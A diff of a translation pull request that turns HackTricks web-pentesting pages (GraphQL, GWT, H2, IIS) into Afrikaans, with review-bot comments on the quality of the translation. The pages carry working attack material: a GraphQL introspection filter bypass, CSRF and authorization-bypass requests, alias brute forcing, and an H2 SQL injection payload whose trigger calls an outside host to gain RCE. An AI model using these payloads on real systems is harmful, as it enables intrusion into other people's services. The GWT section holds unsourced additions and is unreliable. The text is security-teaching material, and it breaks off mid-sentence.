Defenses** -To bypass restrictions on introspection queries in APIs, inserting a **special character after the `__schema` keyword** proves effective. This method exploits common developer oversights in regex patterns that aim to block introspection by focusing on the `__schema` keyword. By adding characters like **spaces, new lines, and commas**, which GraphQL ignores but might not be accounted for in regex, restrictions can be circumvented. 
For instance, an introspection query with a newline after `__schema` may bypass such defenses: - +Om beperkings op introspeksie-navrae in API's te omseil, is dit effektief om 'n **spesiale karakter na die `__schema` sleutelwoord** in te voeg. Hierdie metode maak gebruik van algemene ontwikkelaarsoorsigte in regex-patrone wat daarop gemik is om introspeksie te blokkeer deur te fokus op die `__schema` sleutelwoord. Deur karakters soos **spasies, nuwe lyne en kommas** by te voeg, wat GraphQL ignoreer maar moontlik nie in regex verreken word nie, kan beperkings omseil word. Byvoorbeeld, 'n introspeksie-navraag met 'n nuwe lyn na `__schema` mag sulke verdedigings omseil: ```bash # Example with newline to bypass -{ - "query": "query{__schema - {queryType{name}}}" +{ +"query": "query{__schema +{queryType{name}}}" } ``` +Indien onsuksesvol, oorweeg alternatiewe versoekmetodes, soos **GET-versoeke** of **POST met `x-www-form-urlencoded`**, aangesien beperkings moontlik slegs op POST-versoeke van toepassing kan wees. -If unsuccessful, consider alternative request methods, such as **GET requests** or **POST with `x-www-form-urlencoded`**, since restrictions may apply only to POST requests. - -### **Discovering Exposed GraphQL Structures** - -When introspection is disabled, examining the website's source code for preloaded queries in JavaScript libraries is a useful strategy. These queries can be found using the `Sources` tab in developer tools, providing insights into the API's schema and revealing potentially **exposed sensitive queries**. The commands to search within the developer tools are: +### **Ontdekking van Blootgestelde GraphQL-Strukture** +Wanneer introspeksie gedeaktiveer is, is dit 'n nuttige strategie om die bronkode van die webwerf te ondersoek vir vooraf gelaaide navrae in JavaScript-biblioteke. 
Hierdie navrae kan gevind word deur die `Bronne`-tabblad in die ontwikkelaarshulpmiddels te gebruik, wat insig gee in die API se skema en moontlik **blootgestelde sensitiewe navrae** onthul. Die opdragte om binne die ontwikkelaarshulpmiddels te soek, is: ```javascript Inspect/Sources/"Search all files" file:* mutation file:* query ``` - ## CSRF in GraphQL -If you don't know what CSRF is read the following page: +As jy nie weet wat CSRF is nie, lees die volgende bladsy: {% content-ref url="../../pentesting-web/csrf-cross-site-request-forgery.md" %} [csrf-cross-site-request-forgery.md](../../pentesting-web/csrf-cross-site-request-forgery.md) {% endcontent-ref %} -Out there you are going to be able to find several GraphQL endpoints **configured without CSRF tokens.** - -Note that GraphQL request are usually sent via POST requests using the Content-Type **`application/json`**. +Daar buite sal jy verskeie GraphQL-eindpunte vind wat **gekonfigureer is sonder CSRF-tokens**. +Let daarop dat GraphQL-versoeke gewoonlik gestuur word deur POST-versoeke te gebruik met die Content-Type **`application/json`**. ```javascript {"operationName":null,"variables":{},"query":"{\n user {\n firstName\n __typename\n }\n}\n"} ``` - -However, most GraphQL endpoints also support **`form-urlencoded` POST requests:** - +Echter, die meeste GraphQL eindpunte ondersteun ook **`form-urlencoded` POST-aanvrae:** ```javascript query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A ``` +Daarom, aangesien CSRF-versoeke soos die vorige een **sonder vooraanvraagversoeke** gestuur word, is dit moontlik om **veranderings** in die GraphQL te maak deur 'n CSRF te misbruik. -Therefore, as CSRF requests like the previous ones are sent **without preflight requests**, it's possible to **perform** **changes** in the GraphQL abusing a CSRF. +Let egter daarop dat die nuwe verstekkoekiewaarde van die `samesite`-vlag van Chrome `Lax` is. 
Dit beteken dat die koekie slegs gestuur sal word van 'n derde party-web in GET-versoeke. -However, note that the new default cookie value of the `samesite` flag of Chrome is `Lax`. This means that the cookie will only be sent from a third party web in GET requests. +Let daarop dat dit gewoonlik moontlik is om die **navraagversoek** ook as 'n **GET**-versoek te stuur en die CSRF-token mag nie in 'n GET-versoek gevalideer word nie. -Note that it's usually possible to send the **query** **request** also as a **GET** **request and the CSRF token might not being validated in a GET request.** +Daarbenewens kan dit moontlik wees om inhoud van die GraphQL-eindpunt te eksfiltreer deur die gebruikerslegitimasie te misbruik deur 'n [**XS-Soek**](../../pentesting-web/xs-search.md) **aanval** te misbruik. -Also, abusing a [**XS-Search**](../../pentesting-web/xs-search.md) **attack** might be possible to exfiltrate content from the GraphQL endpoint abusing the credentials of the user. +Vir meer inligting, **kyk na die** [**oorspronklike berig hier**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html). -For more information **check the** [**original post here**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html). +## Magtiging in GraphQL -## Authorization in GraphQL +Baie GraphQL-funksies wat op die eindpunt gedefinieer is, mag slegs die outentifikasie van die versoeker nagaan, maar nie magtiging nie. -Many GraphQL functions defined on the endpoint might only check the authentication of the requester but not authorization. - -Modifying query input variables could lead to sensitive account details [leaked](https://hackerone.com/reports/792927). - -Mutation could even lead to account takeover trying to modify other account data. +Die wysiging van navraaginskrywingsveranderlikes kan lei tot die **uitlek** van sensitiewe rekeningbesonderhede [leaked](https://hackerone.com/reports/792927). 
+Mutering kan selfs lei tot rekeningsoorname deur te probeer om ander rekeningdata te wysig. ```javascript { - "operationName":"updateProfile", - "variables":{"username":INJECT,"data":INJECT}, - "query":"mutation updateProfile($username: String!,...){updateProfile(username: $username,...){...}}" +"operationName":"updateProfile", +"variables":{"username":INJECT,"data":INJECT}, +"query":"mutation updateProfile($username: String!,...){updateProfile(username: $username,...){...}}" } ``` +### Omseil outorisasie in GraphQL -### Bypass authorization in GraphQL +[Deur navrae aan mekaar te koppel](https://s1n1st3r.gitbook.io/theb10g/graphql-query-authentication-bypass-vuln) kan 'n swak outentifikasie stelsel omseil word. -[Chaining queries](https://s1n1st3r.gitbook.io/theb10g/graphql-query-authentication-bypass-vuln) together can bypass a weak authentication system. - -In the below example you can see that the operation is "forgotPassword" and that it should only execute the forgotPassword query associated with it. This can be bypassed by adding a query to the end, in this case we add "register" and a user variable for the system to register as a new user. +In die onderstaande voorbeeld kan jy sien dat die operasie "forgotPassword" is en dat dit slegs die forgotPassword navraag wat daarmee geassosieer word, moet uitvoer. Dit kan omseil word deur 'n navraag aan die einde toe te voeg, in hierdie geval voeg ons "register" en 'n gebruikersveranderlike by sodat die stelsel dit as 'n nuwe gebruiker kan registreer.
-## Bypassing Rate Limits Using Aliases in GraphQL +## Omseilings van tariefgrense deur gebruik te maak van aliase in GraphQL -In GraphQL, aliases are a powerful feature that allow for the **naming of properties explicitly** when making an API request. This capability is particularly useful for retrieving **multiple instances of the same type** of object within a single request. Aliases can be employed to overcome the limitation that prevents GraphQL objects from having multiple properties with the same name. +In GraphQL is aliase 'n kragtige funksie wat dit moontlik maak om **eienskappe eksplisiet te benoem** wanneer 'n API-versoek gedoen word. Hierdie vermoë is veral nuttig vir die herwinning van **veralgehele van dieselfde tipe** objek binne 'n enkele versoek. Aliase kan gebruik word om die beperking te oorkom wat voorkom dat GraphQL-objekte meerdere eienskappe met dieselfde naam het. -For a detailed understanding of GraphQL aliases, the following resource is recommended: [Aliases](https://portswigger.net/web-security/graphql/what-is-graphql#aliases). +Vir 'n gedetailleerde begrip van GraphQL aliase, word die volgende bron aanbeveel: [Aliase](https://portswigger.net/web-security/graphql/what-is-graphql#aliases). -While the primary purpose of aliases is to reduce the necessity for numerous API calls, an unintended use case has been identified where aliases can be leveraged to execute brute force attacks on a GraphQL endpoint. This is possible because some endpoints are protected by rate limiters designed to thwart brute force attacks by restricting the **number of HTTP requests**. However, these rate limiters might not account for the number of operations within each request. Given that aliases allow for the inclusion of multiple queries in a single HTTP request, they can circumvent such rate limiting measures. - -Consider the example provided below, which illustrates how aliased queries can be used to verify the validity of store discount codes. 
This method could sidestep rate limiting since it compiles several queries into one HTTP request, potentially allowing for the verification of numerous discount codes simultaneously. +Terwyl die primêre doel van aliase is om die noodsaaklikheid van talle API-aanroepe te verminder, is daar 'n onbedoelde gebruik waar aliase gebruik kan word om brute force aanvalle op 'n GraphQL-eindpunt uit te voer. Dit is moontlik omdat sommige eindpunte beskerm word deur tariefgrense wat ontwerp is om brute force aanvalle te beperk deur die **aantal HTTP-versoeke** te beperk. Hierdie tariefgrense hou egter nie rekening met die aantal operasies binne elke versoek nie. Gegewe dat aliase die insluiting van verskeie navrae in 'n enkele HTTP-versoek toelaat, kan dit sulke tariefgrense omseil. +Oorweeg die onderstaande voorbeeld wat illustreer hoe gealiaseerde navrae gebruik kan word om die geldigheid van winkel afslagkodes te verifieer. Hierdie metode kan tariefgrense omseil deurdat dit verskeie navrae in een HTTP-versoek saamstel, wat moontlik maak om gelyktydig die geldigheid van verskeie afslagkodes te verifieer. ```bash # Example of a request utilizing aliased queries to check for valid discount codes query isValidDiscount($code: Int) { - isvalidDiscount(code:$code){ - valid - } - isValidDiscount2:isValidDiscount(code:$code){ - valid - } - isValidDiscount3:isValidDiscount(code:$code){ - valid - } +isvalidDiscount(code:$code){ +valid +} +isValidDiscount2:isValidDiscount(code:$code){ +valid +} +isValidDiscount3:isValidDiscount(code:$code){ +valid +} } ``` +## Gereedskap -## Tools +### Kwesbaarheidsskanners -### Vulnerability scanners +* [https://github.com/gsmith257-cyber/GraphCrawler](https://github.com/gsmith257-cyber/GraphCrawler): Toolkit wat gebruik kan word om skemas te gryp en te soek vir sensitiewe data, toets outorisasie, skema-bruteforce, en paaie na 'n gegewe tipe te vind. 
+* [https://blog.doyensec.com/2020/03/26/graphql-scanner.html](https://blog.doyensec.com/2020/03/26/graphql-scanner.html): Kan gebruik word as 'n afsonderlike of [Burp-uitbreiding](https://github.com/doyensec/inql). +* [https://github.com/swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap): Kan ook gebruik word as 'n CLI-kliënt om aanvalle outomaties te outomatiseer. +* [https://gitlab.com/dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum): Gereedskap wat die verskillende maniere lys om 'n gegewe tipe in 'n GraphQL-skema te bereik. +* [https://github.com/doyensec/inql](https://github.com/doyensec/inql): Burp-uitbreiding vir gevorderde GraphQL-toetsing. Die _**Scanner**_ is die kern van InQL v5.0, waar jy 'n GraphQL-eindpunt of 'n plaaslike introspeksie-skemabestand kan analiseer. Dit genereer outomaties alle moontlike navrae en mutasies, en organiseer dit in 'n gestruktureerde weergawe vir jou analise. Die _**Attacker**_ komponent stel jou in staat om batery-aanvalle op GraphQL uit te voer, wat nuttig kan wees om swak geïmplementeerde tempo-limiete te omseil. -* [https://github.com/gsmith257-cyber/GraphCrawler](https://github.com/gsmith257-cyber/GraphCrawler): Toolkit that can be used to grab schemas and search for sensitive data, test authorization, brute force schemas, and find paths to a given type. -* [https://blog.doyensec.com/2020/03/26/graphql-scanner.html](https://blog.doyensec.com/2020/03/26/graphql-scanner.html): Can be used as standalone or [Burp extension](https://github.com/doyensec/inql). -* [https://github.com/swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap): Can be used as a CLI client also to automate attacks -* [https://gitlab.com/dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum): Tool that lists the different ways of reaching a given type in a GraphQL schema. 
-* [https://github.com/doyensec/inql](https://github.com/doyensec/inql): Burp extension for advanced GraphQL testing. The _**Scanner**_ is the core of InQL v5.0, where you can analyze a GraphQL endpoint or a local introspection schema file. It auto-generates all possible queries and mutations, organizing them into a structured view for your analysis. The _**Attacker**_ component lets you run batch GraphQL attacks, which can be useful for circumventing poorly implemented rate limits. +### Kliënte -### Clients +* [https://github.com/graphql/graphiql](https://github.com/graphql/graphiql): GUI-kliënt +* [https://altair.sirmuel.design/](https://altair.sirmuel.design/): GUI-kliënt -* [https://github.com/graphql/graphiql](https://github.com/graphql/graphiql): GUI client -* [https://altair.sirmuel.design/](https://altair.sirmuel.design/): GUI Client - -### Automatic Tests +### Outomatiese Toetse {% embed url="https://graphql-dashboard.herokuapp.com/" %} -* Video explaining AutoGraphQL: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU) +* Video wat AutoGraphQL verduidelik: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU) -## References +## Verwysings * [**https://jondow.eu/practical-graphql-attack-vectors/**](https://jondow.eu/practical-graphql-attack-vectors/) * [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696) @@ -536,14 +496,14 @@ query isValidDiscount($code: Int) {
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
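Review bot: indentation inside the fenced examples of this graphql.md hunk was stripped during translation: the `updateProfile` JSON block (`"operationName":"updateProfile"`, `"variables":{"username":INJECT,"data":INJECT}`) and the aliased `isValidDiscount` query lose their leading spaces in the `+` lines, which changes nothing semantically but flattens the nested selection sets into an unreadable column; the contents of a code fence should be left byte-for-byte as in the source. Terminology is also inconsistent within the hunk: rate limits become `tariefgrense` in the `## Omseilings van tariefgrense` heading and body but `tempo-limiete` in the InQL bullet, and the section is titled `## Magtiging in GraphQL` while its subsection reads `### Omseil outorisasie in GraphQL` and the body `'n swak outentifikasie stelsel`; pick one term for authorization and one for authentication. `veralgehele van dieselfde tipe` is not a rendering of "multiple instances of the same type" (suggest `veelvuldige instansies van dieselfde tipe`), and `Hierdie tariefgrense hou egter nie rekening met die aantal operasies ... nie` turns the source's hedged "might not account for" into a definite claim, so keep the hedge (`hou dalk nie rekening ... nie`). Lastly the link text `[leaked]` was left in English right after its translation `**uitlek**`, so the sentence states it twice, and `deur die gebruikerslegitimasie te misbruik deur 'n ... **aanval** te misbruik` repeats `misbruik`; one occurrence is enough.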
diff --git a/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md b/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md index 8a0780c9a..1834132b0 100644 --- a/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md +++ b/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md 
@@ -1,2 +1,49 @@ # GWT - Google Web Toolkit +Die Google Web Toolkit (GWT) is 'n raamwerk wat gebruik word om ryk en interaktiewe webtoepassings te ontwikkel. Dit maak gebruik van Java as die primêre programmeertaal en vertaal die Java-kode na effektiewe en opteimale JavaScript-kode vir uitvoering in die webblaaier. + +## GWT-kenmerke + +- **Java-gebaseerd**: GWT maak gebruik van Java as die primêre programmeertaal, wat dit maklik maak vir ontwikkelaars wat reeds bekend is met Java om webtoepassings te bou. + +- **Kode-vertaling**: GWT vertaal die Java-kode na JavaScript-kode wat deur die webblaaier uitgevoer kan word. Dit maak dit moontlik om ryk en interaktiewe gebruikerskoppelvlakke te skep sonder om handmatig JavaScript-kode te skryf nie. + +- **UI-komponente**: GWT bied 'n verskeidenheid voorafgeboude gebruikerskoppelvlakkomponente wat outomaties aangepas kan word vir verskillende webblaaierplatforms. + +- **RPC**: GWT bevat 'n Remote Procedure Call (RPC) meganisme wat kommunikasie tussen die kliënt en die bediener fasiliteer. Dit maak dit moontlik om data tussen die kliënt en die bediener te stuur sonder om handmatige HTTP-aanvrae te doen. + +- **Ontwikkelingshulpmiddels**: GWT word ondersteun deur 'n verskeidenheid ontwikkelingshulpmiddels, insluitend 'n kragtige ontwikkelingsomgewing en 'n uitgebreide stel biblioteke en hulpprogramme. + +## GWT-pentesting + +Tydens 'n GWT-pentesting moet jy die volgende aspekte ondersoek: + +1. **Kode-analise**: Ondersoek die vertaalde JavaScript-kode om potensiële kwesbaarhede of veiligheidsprobleme te identifiseer. + +2. **Netwerkverkeer**: Analiseer die netwerkverkeer tussen die kliënt en die bediener om enige sensitiewe inligting bloot te stel wat moontlik deur 'n aanvaller benut kan word. + +3. **Gebruikersinteraksie**: Ondersoek die gebruikersinteraksie met die webtoepassing om enige swakheid in die gebruikerskoppelvlak te identifiseer wat 'n potensiële aanvalspunt kan wees. + +4. 
**Bedienerkonfigurasie**: Ondersoek die bedienerkonfigurasie om te verseker dat dit korrek geïmplementeer is en dat daar geen bekende veiligheidslekke is nie. + +5. **Sessiebestuur**: Ondersoek die sessiebestuur van die webtoepassing om te verseker dat dit veilig geïmplementeer is en dat daar geen moontlikhede vir sessie-ontvoering is nie. + +## GWT-hulpmiddels + +Hier is 'n paar nuttige hulpmiddels wat gebruik kan word tydens 'n GWT-pentesting: + +- **GWT Developer Plugin**: 'n Inprop wat in die webblaaier geïnstalleer kan word om die ontwikkeling en debuut van GWT-toepassings te vergemaklik. + +- **GWT-Shell**: 'n Hulpprogram wat gebruik word om GWT-toepassings te vertaal en uit te voer. + +- **GWT-Compiler**: 'n Hulpprogram wat gebruik word om GWT-toepassings na JavaScript-kode te vertaal. + +- **Burp Suite**: 'n Veelomvattende hulpmiddelstel vir webtoepassingpentesting wat gebruik kan word om die netwerkverkeer tussen die kliënt en die bediener te analiseer. + +- **OWASP ZAP**: 'n Ander hulpmiddelstel vir webtoepassingpentesting wat gebruik kan word vir die identifisering van veiligheidskwesbaarhede in GWT-toepassings. + +- **GWT-Penetration-Testing-Tool**: 'n Spesifieke hulpmiddel wat ontwikkel is vir die pentesting van GWT-toepassings. Dit bied 'n verskeidenheid funksies en tegnieke wat spesifiek ontwerp is vir GWT-omgewings. + +## Bronne + +- [GWT - Google Web Toolkit](https://www.gwtproject.org/) diff --git a/network-services-pentesting/pentesting-web/h2-java-sql-database.md b/network-services-pentesting/pentesting-web/h2-java-sql-database.md index 094793d1f..857e7db31 100644 --- a/network-services-pentesting/pentesting-web/h2-java-sql-database.md +++ b/network-services-pentesting/pentesting-web/h2-java-sql-database.md @@ -1,62 +1,60 @@ -# H2 - Java SQL database +# H2 - Java SQL-databasis
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Official page: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html) +Amptelike bladsy: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html) -## Access +## Toegang -You can indicate a **non-existent name a of database** in order to **create a new database without valid credentials** (**unauthenticated**): +Jy kan 'n **nie-bestaande naam van 'n databasis** aandui om 'n nuwe databasis sonder geldige geloofsbriewe te skep (**ongeagteken**): ![](<../../.gitbook/assets/image (258).png>) -Or if you know that for example a **mysql is running** and you know the **database name** and the **credentials** for that database, you can just access it: +Of as jy weet dat byvoorbeeld 'n **mysql besig is** en jy weet die **databasisnaam** en die **geloofsbriewe** vir daardie databasis, kan jy dit net toegang: ![](<../../.gitbook/assets/image (259).png>) -_**Trick from box Hawk of HTB.**_ +_**Truuk uit die Hawk-boks van HTB.**_ ## **RCE** -Having access to communicate with the H2 database check this exploit to get RCE on it: [https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed) +As jy toegang het om met die H2-databasis te kommunikeer, kyk na hierdie uitbuiting om RCE daarop te kry: [https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed) -## H2 SQL Injection to RCE - -In [**this post**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) a payload is explained to get **RCE via a H2 database** abusing a **SQL Injection**. +## H2 SQL-injectie na RCE +In [**hierdie berig**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) word 'n lading verduidelik om **RCE via 'n H2-databasis** te kry deur 'n **SQL-injectie** te misbruik. ```json [...] 
"details": - { - "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;", - "advanced-options": false, - "ssl": true - }, +{ +"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;", +"advanced-options": false, +"ssl": true +}, [...] ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
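Review bot: the gwt-google-web-toolkit.md hunk (`@@ -1,2 +1,49 @@`, two files above) is not a translation: the source has only the heading `# GWT - Google Web Toolkit`, while the `+` lines add 47 lines of new Afrikaans content (a feature list, a five-step pentesting checklist and a tool list that names a `GWT-Penetration-Testing-Tool`) with no English counterpart in the file being translated and no source for the claims beyond a single link to gwtproject.org. A translation PR should not introduce material the upstream file does not carry; drop the additions so the file mirrors the source, or raise them in a separate content PR with references. If any of it is kept, `opteimale` is a typo for `optimale`.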
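Review bot: several renderings in the h2-java-sql-database.md hunk are wrong or ungrammatical: `(**ongeagteken**)` is not an Afrikaans word for "unauthenticated" (suggest `sonder verifikasie`), `'n **mysql besig is**` does not mean "a mysql is running" (suggest `'n **mysql loop**`), `kan jy dit net toegang` lacks a verb (suggest `kan jy bloot daartoe toegang kry`), and `SQL-injectie` is the Dutch form where Afrikaans uses `SQL-inspuiting`. As in the other files, the indentation of the JSON example (`"db": "zip:/app/metabase.jar!/sample-database.db;...`, `"advanced-options": false`, `"ssl": true`) was stripped inside the fence and should be restored. The support footer is translated twice in this one file with different wording (`hacktruuks` at the top, `hacking-truuks` at the bottom, and `haktruuks` in graphql.md); translate the boilerplate once and reuse it verbatim.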
diff --git a/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/network-services-pentesting/pentesting-web/iis-internet-information-services.md index b0772d3ee..b9b2f4a00 100644 --- a/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -1,39 +1,66 @@ -# IIS - Internet Information Services +# IIS - Internet Inligtingsdienste
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-Test executable file extensions: +Toets uitvoerbare lêeruitbreidings: * asp * aspx * config * php -## Internal IP Address disclosure - -On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address: +## Openbaarmaking van interne IP-adres +Op enige IIS-bediener waar jy 'n 302 kry, kan jy probeer om die Host-kop te verwyder en HTTP/1.0 te gebruik. Binne die respons kan die Location-kop na die interne IP-adres verwys: ``` nc -v domain.com 80 openssl s_client -connect domain.com:443 ``` +### Response wat die interne IP-adres bekend maak: -Response disclosing the internal IP: +As jy 'n HTTP-aanvraag stuur na 'n IIS-bediener, kan jy soms 'n respons ontvang wat die interne IP-adres van die bediener bekend maak. Hierdie inligting kan nuttig wees vir 'n aanvaller om verdere aanvalle te beplan. +Dit is belangrik om hierdie inligting te beskerm en te voorkom dat dit uitlek. Om dit te doen, moet jy die volgende stappe volg: + +1. Stel die `UseHostName`-parameter in op `true` in die 